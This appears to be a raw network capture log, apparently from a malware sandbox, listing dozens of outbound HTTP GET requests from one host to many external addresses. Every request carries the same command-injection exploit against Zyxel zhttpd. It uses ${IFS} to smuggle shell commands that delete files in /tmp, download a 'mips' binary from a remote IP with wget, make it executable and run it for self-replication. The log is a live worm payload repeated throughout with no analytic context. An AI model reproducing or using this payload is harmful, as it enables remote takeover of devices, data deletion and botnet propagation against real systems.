                              Mar 31, 2024 08:41:24.808044910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4057192.168.2.135334242.44.139.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808103085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4058192.168.2.136091844.57.95.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808134079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4059192.168.2.133848851.158.161.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808182001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4060192.168.2.1332810156.66.19.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808198929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4061192.168.2.1351520191.241.167.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808223009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4062192.168.2.1355858104.66.220.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808295965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4063192.168.2.1339858208.195.208.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808346033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4064192.168.2.135719218.170.155.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808373928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4065192.168.2.1349684218.160.109.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808444023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4066192.168.2.1342804104.212.221.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808479071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4067192.168.2.1347996221.179.97.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808510065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4068192.168.2.1335978136.1.9.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808549881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4069192.168.2.1351040110.134.81.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808573008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4070192.168.2.1346148126.247.54.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808603048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4071192.168.2.1339414210.232.144.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808650970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4072192.168.2.1337990119.81.153.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808686018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4073192.168.2.135620644.5.224.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808703899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4074192.168.2.134113070.93.66.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808743954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4075192.168.2.134300820.32.54.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808759928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4076192.168.2.1346574165.180.252.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808788061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4077192.168.2.1335932144.204.86.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808825970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4078192.168.2.134432491.7.88.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808876038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4079192.168.2.135291284.151.180.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808903933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4080192.168.2.133830853.216.175.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808903933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4081192.168.2.1334956191.54.45.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808942080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4082192.168.2.1346834153.202.198.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808991909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4083192.168.2.1347400136.135.203.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.809032917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4084192.168.2.1354508182.77.74.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.809081078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4085192.168.2.1354600117.21.208.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.809117079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4086192.168.2.1356526219.103.214.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.809155941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4087192.168.2.1359652142.52.64.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812683105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4088192.168.2.134699431.23.203.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812714100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4089192.168.2.135440478.174.84.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812762022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4090192.168.2.1334842134.220.56.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812783003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4091192.168.2.134021092.187.181.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812812090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4092192.168.2.134081660.229.41.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812851906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4093192.168.2.13406301.196.186.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812874079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4094192.168.2.1355022189.161.34.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812917948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4095192.168.2.1359792158.68.248.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812937975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4096192.168.2.13468142.7.224.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812954903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4097192.168.2.133674694.149.174.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.812993050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4098192.168.2.1343202187.134.229.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813046932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4099192.168.2.1342444131.20.117.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813069105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4100192.168.2.134651658.246.76.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813122034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4101192.168.2.133572270.166.164.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813168049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4102192.168.2.13362302.109.246.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813191891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4103192.168.2.1357368164.247.45.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813240051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4104192.168.2.1336718125.61.243.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813276052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4105192.168.2.133465435.102.122.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813301086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4106192.168.2.1348542138.28.60.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813327074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4107192.168.2.1360300195.226.35.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813337088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4108192.168.2.133904698.175.30.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.813378096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4109192.168.2.1351508125.105.172.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822626114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4110192.168.2.135704269.235.154.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822655916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4111192.168.2.1338674134.147.3.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822716951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4112192.168.2.1348828157.242.34.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822760105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4113192.168.2.135031698.228.67.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822766066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4114192.168.2.1346536182.137.138.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822809935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4115192.168.2.133389019.186.72.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822844982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4116192.168.2.1346900159.159.165.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822905064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4117192.168.2.135839476.18.156.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822927952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4118192.168.2.134423681.112.237.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822966099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4119192.168.2.1343728202.108.0.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.822983980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4120192.168.2.1332784108.166.84.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823040009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4121192.168.2.1335122163.200.150.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823096991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4122192.168.2.1335658183.173.160.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823116064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4123192.168.2.1346854102.114.5.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823147058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4124192.168.2.135999665.109.130.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823206902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4125192.168.2.134045648.9.183.188443
                              TimestampBytes transferredDirectionData
